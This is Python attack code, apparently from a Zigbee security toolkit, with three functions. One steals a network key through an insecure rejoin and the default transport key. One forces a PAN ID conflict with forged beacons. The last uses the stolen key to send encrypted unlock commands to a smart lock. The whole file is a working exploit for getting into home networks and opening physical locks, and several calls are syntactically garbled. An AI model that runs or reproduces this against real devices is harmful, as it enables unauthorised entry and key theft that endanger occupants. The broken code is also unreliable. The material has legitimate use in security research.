def insecure_rejoin_by_panid(radio, panid, src_addr=None, extended_src=None, coord_addr=None, seq_num=None, nwk_seq_num=None): if src_addr is None: src_addr = random.randint(0,0xfff0) if extended_src is None: extended_src = random.randint(0, 0xffffffffffffffff) if coord_addr is None: coord_addr = find_coord_addr_by_panid(radio, panid) if seq_num is None: seq_num = random.randint(0,255) if nwk_seq_num is None: nwk_seq_num = random.randint(0,255) if coord_addr is None: print_info("No coordinator address seen, using default of 0x0000") coord_addr = 0x0000 dot15d4_seq_iter = SequenceIterator(initial_value=seq_num, value_limit=255) nwk_seq_iter = SequenceIterator(initial_value=nwk_seq_num, value_limit=255) print_notify("Attempting to join PAN ID 0x%04x using insecure rejoin" % panid) print_info("Sending insecure rejoin") radio.send_and_retry(insecure_rejoin(src_addr, coord_addr, panid, extended_src,, radio.send_and_retry(data_request(src_addr, coord_addr, panid, coord_extended_src = None print_info("Awaiting response...") timer = Timer(RESPONSE_TIME_LIMIT) while(not timer.has_expired()): frame = radio.receive_and_ack(addr=src_addr, panid=panid) if is_rejoin_response(frame): print_notify("Rejoin response observed") coord_extended_src = frame[ZigbeeNWK].ext_src radio.send_and_retry(data_request(src_addr, coord_addr, panid, break if coord_extended_src is None: print_error("No rejoin response observed") print_info("Awaiting transport key...") timer.reset() while(not timer.has_expired()): frame = radio.receive_and_ack(addr=src_addr, panid=panid) if is_transport_key(frame): print_notify("Transport key observed") print_info("Attempting to decrypt the network key") coord_extended_source_bytes = extended_address_bytes(coord_extended_src) decrypted, valid = crypto_utils.zigbee_packet_decrypt(crypto_utils.zigbee_trans_key(crypto_utils.DEFAULT_TRANSPORT_KEY), frame, coord_extended_source_bytes) if valid: print_notify("Network key acquired") network_key = bytes(decrypted)[2:18] print_info("Extracted key is 0x%s" % network_key.hex()) return network_key else: print_info(str(coord_extended_source_bytes)) print_error("Network key could not be decrypted") return None
def pan_conflict_by_panid(radio, panid, network_key=None, coord_ext_addr=None): print_info("Performing PAN ID conflict") conflict_sent = False for attempt in range(NUMBER_OF_ATTEMPTS): seq_num = random.randint(0, 255) seq_iter = SequenceIterator(seq_num) radio.send(beacon_request( timer = Timer(RESPONSE_TIME_LIMIT) while not timer.has_expired(): frame = radio.receive() if is_beacon_response(frame): if frame[Dot15d4FCS].src_panid == panid: print_info("Network observed, sending conflict") current_seq_num = radio.send(beacon_response(panid, seq_num=current_seq_num)) radio.send(beacon_response(panid, seq_num=current_seq_num)) break if network_key is not None and coord_ext_addr is not None: timer.reset() print_info( "Verifying the conflict took by looking for the network update" ) while not timer.has_expired(): frame = radio.receive() if frame is not None and ZigbeeSecurityHeader in frame: coord_ext_addr_bytes = extended_address_bytes( coord_ext_addr) decrypted, valid = crypto_utils.zigbee_packet_decrypt( network_key, frame, coord_ext_addr_bytes) if valid: if bytes(decrypted)[0] == 0x0a: print_info( "Network update observed. PAN conflict worked") return True print_error( "Did not observe a network update. PAN conflict likely failed") return False return True
def unlock_lock(radio, panid, addr, network_key, coord_addr=None, coord_extended_addr=None, frame_counter=None): if coord_addr is None: coord_addr = find_coord_addr_by_panid(radio, panid) if coord_extended_addr is None: coord_extended_addr, frame_counter = wait_for_extended_address_also_frame_counter( radio, panid, coord_addr) if frame_counter is None: frame_counter = wait_for_frame_counter(radio, panid, coord_addr) if coord_addr is None or coord_extended_addr is None or frame_counter is None: print_error( "Could not find the required data to send the unlock request") frame_counter_iter = SequenceIterator(frame_counter + 1, 0xffffffff) sequence_number = random.randint(0, 255) nwk_sequence_number = random.randint(0, 255) aps_counter = random.randint(0, 255) zcl_sequence_number = random.randint(0, 255) print_info("Attempting to unlock lock") timer = Timer(OBSERVATION_TIME) conflict_succeeded = False for attempt in range(3): # it is going to be more reliable if we sync the conflict with the device's data request to avoid having it see the network change packet while not timer.has_expired(): frame = radio.receive() if is_data_request(frame) and get_source(frame) == addr: if pan_conflict_by_panid(radio, panid, network_key=network_key, coord_ext_addr=coord_extended_addr): conflict_succeeded = True break if conflict_succeeded: break timer.reset() if conflict_succeeded: print_info("Waiting 4 seconds for the conflict to resolve") timer = Timer(4) while not timer.has_expired(): frame = radio.receive_and_ack(panid=panid, addr=coord_addr) radio.load_frame( encrypted_unlock(panid, coord_addr, addr, coord_extended_addr, network_key,, seq_num=sequence_number, nwk_seq_num=nwk_sequence_number, aps_counter=aps_counter, zcl_seq_num=zcl_sequence_number)) data_request_counter = 0 timer = Timer(1) while not timer.has_expired(): frame = radio.receive_and_ack(panid=panid, addr=coord_addr) print_info("Waiting for the lock to send a couple data requests") unlock_sent = False timer = Timer(OBSERVATION_TIME) while not timer.has_expired(): frame = radio.receive_and_ack(panid=panid, addr=coord_addr) if is_data_request(frame): data_request_counter += 1 if data_request_counter == 2: print_notify("Sending unlock command") radio.fire_and_retry() unlock_sent = True break return unlock_sent else: print_info( "We're going to send a bunch of unlock requests and hope one goes through" ) for attempts in range(20): radio.load_frame( encrypted_unlock(panid, coord_addr, addr, coord_extended_addr, network_key,, seq_num=sequence_number, nwk_seq_num=nwk_sequence_number, aps_counter=aps_counter, zcl_seq_num=zcl_sequence_number)) timer = Timer(OBSERVATION_TIME) while not timer.has_expired(): frame = radio.receive_and_ack(panid=panid, addr=coord_addr) if is_data_request(frame): print_notify("Sending unlock command") radio.fire_and_retry() break return True